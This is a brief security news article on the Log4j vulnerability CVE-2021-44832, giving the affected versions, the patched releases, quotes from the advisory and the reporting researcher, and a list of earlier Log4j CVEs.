New Apache Log4j Update Patch Released for Newly Discovered Vulnerability
Reading Time: 2 minutes

A New Apache Log4j update patch has been released on Tuesday by Apache Software Foundation(ASF) to mitigate the newly-discovered vulnerability. Log4j contains an arbitrary code execution flaw which makes it possible for threat actors to exploit it on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.

The vulnerability has been tracked as CVE-2021-44832 and is rated 6.6 in severity on a scale of 10. It impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. The Log4j version of 1.x is not affected, while users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

The ASF in an advisory said, “Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.”

Checkmarx security researcher Yaniv Nizry claimed credit for reporting the vulnerability to  Apache on December 27.

According to Nizry, “The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration. Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.”

The project maintainers have addressed four issues so far with Log4j along with the latest fix since the Log4Shell flaw came to light earlier this month. Still, one more vulnerability remains to be patched which affects the version Log4j 1.2.

  • CVE-2021-44228 (CVSS score: 10.0) – A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
  • CVE-2021-45046 (CVSS score: 9.0) – An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
  • CVE-2021-45105 (CVSS score: 7.5) – A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
  • CVE-2021-4104 (CVSS score: 8.1) – An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)

Related Articles:
Iranian hacking group Suspected of Targeting an Airline with New Backdoor
New Fileless Malware – Evades detection by using Windows Registry as Storage
UK Government – National Cyber Strategy Will introduce BritChip for mobile devices by 2025